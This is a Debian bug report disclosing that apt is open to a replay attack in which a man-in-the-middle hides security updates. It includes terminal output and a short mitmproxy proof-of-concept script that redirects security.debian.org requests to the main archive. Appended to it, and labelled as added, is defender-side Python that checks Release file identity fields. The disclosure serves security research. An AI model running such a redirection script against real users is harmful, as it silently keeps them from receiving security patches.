
Bug#863317: apt: susceptible to replay attacks



Package: apt
Version: 1.0.9.8.4
Tags: security

Nearly a decade ago, Valid-Until fields were added to Release files (bug #499897). The primary motivation for this was to prevent a man-in-the-middle adversary from serving an outdated copy of the security mirror.

Unfortunately, this protection is ineffective. All the attacker needs to do to hide security updates is to replace all the files from http://security.debian.org/dists/$DIST/updates/ with the ones from http://deb.debian.org/debian/dists/$DIST/ .

I've attached a proof-of-concept mitmproxy script that implements this attack:

   # apt-cache policy bitlbee
   bitlbee:
     Installed: (none)
     Candidate: 3.2.2-2+deb8u1
     Version table:
        3.2.2-2+deb8u1 0
           500 http://security.debian.org/ jessie/updates/main i386 Packages
        3.2.2-2 0
           500 http://http.us.debian.org/debian/ jessie/main i386 Packages

   # apt-get update -o Acquire::http::Proxy=http://127.0.0.1:8080
   Ign http://http.us.debian.org jessie InRelease
   Hit http://http.us.debian.org jessie-updates InRelease
   Hit http://http.us.debian.org jessie Release.gpg
   Ign http://security.debian.org jessie/updates InRelease
   Get:1 http://http.us.debian.org jessie-updates/main i386 Packages/DiffIndex [7900 B]
   Get:2 http://security.debian.org jessie/updates Release.gpg [2373 B]
   Hit http://http.us.debian.org jessie Release
   Hit http://http.us.debian.org jessie/main i386 Packages
   Get:3 http://security.debian.org jessie/updates Release [148 kB]
   Get:4 http://security.debian.org jessie/updates/main i386 Packages [6793 kB]
   Fetched 6952 kB in 7s (978 kB/s)
   Reading package lists... Done

   # apt-cache policy bitlbee
   bitlbee:
     Installed: (none)
     Candidate: 3.2.2-2
     Version table:
        3.2.2-2 0
           500 http://http.us.debian.org/debian/ jessie/main i386 Packages
           500 http://security.debian.org/ jessie/updates/main i386 Packages


-- System Information:
Debian Release: 8.8
 APT prefers stable-updates
 APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages apt depends on:
ii  debian-archive-keyring  2014.3
ii  gnupg                   1.4.18-7+deb8u3
ii  libapt-pkg4.12          1.0.9.8.4
ii  libc6                   2.19-18+deb8u9
ii  libgcc1                 1:4.9.2-10
ii  libstdc++6              4.9.2-10

--
Jakub Wilk
# Usage: mitmproxy [options] -s no-security.d.o.py

try:
    import mitmproxy
except ImportError:  # mitmproxy < 0.18
    def request(ctx, flow):
        return _request(flow)
else:  # mitmproxy >= 0.18
    def request(flow):
        return _request(flow)

def _request(flow):
    if flow.request.host == 'security.debian.org' and flow.request.port == 80:
        flow.request.anticache()
        flow.request.path = '/debian' + flow.request.path.replace('/updates/', '/')
        flow.request.host = 'deb.debian.org'
        flow.request.headers['Host'] = ['deb.debian.org']
        flow.scheme = 'http'

# vim:ts=4 sts=4 sw=4 et
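The following is an added defender-side example, not part of the bug report or of apt itself. It shows why Valid-Until alone cannot catch the substitution described above: the swapped-in Release file is genuinely signed and still within its validity window, so only the identity fields (Label, Codename, Components) tell the security archive apart from the main archive. The sample Release headers and the expectation table are constructed for illustration and the field values are not copies of the real archive files.

```python
def parse_release(text):
    """Parse the single-line header fields of an apt Release file into a dict.
    Indented continuation lines (the per-file hash lists) are skipped."""
    fields = {}
    for line in text.splitlines():
        if line[:1] in (" ", "\t") or ":" not in line:
            continue
        key, _, value = line.partition(":")
        fields[key.strip()] = value.strip()
    return fields


def release_mismatches(release_text, expected):
    """Compare the identity fields of a Release file against what the
    configured source is supposed to serve. Returns a list of mismatch
    descriptions; an empty list means the file belongs to that source."""
    fields = parse_release(release_text)
    problems = []
    for name in ("Origin", "Label", "Codename"):
        if fields.get(name) != expected[name]:
            problems.append("%s: got %r, expected %r"
                            % (name, fields.get(name), expected[name]))
    served = set(fields.get("Components", "").split())
    missing = sorted(set(expected["Components"]) - served)
    if missing:
        problems.append("Components: missing %s" % missing)
    return problems


# Constructed sample Release headers (illustrative values, not the real files).
# Both are "valid" by date; only the identity fields differ.
SECURITY_RELEASE = """\
Origin: Debian
Label: Debian-Security
Suite: stable
Codename: jessie
Valid-Until: Sat, 20 May 2017 10:00:00 UTC
Components: updates/main updates/contrib updates/non-free
"""

MAIN_RELEASE = """\
Origin: Debian
Label: Debian
Suite: stable
Codename: jessie
Valid-Until: Sat, 20 May 2017 10:00:00 UTC
Components: main contrib non-free
"""

# Hypothetical expectation table for a client configured with
# "deb http://security.debian.org/ jessie/updates main" (not an apt feature).
EXPECTED_SECURITY = {"Origin": "Debian", "Label": "Debian-Security",
                     "Codename": "jessie", "Components": ["updates/main"]}
```

Running `release_mismatches(MAIN_RELEASE, EXPECTED_SECURITY)` flags the Label and the missing `updates/main` component, while the genuine security Release file passes cleanly.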
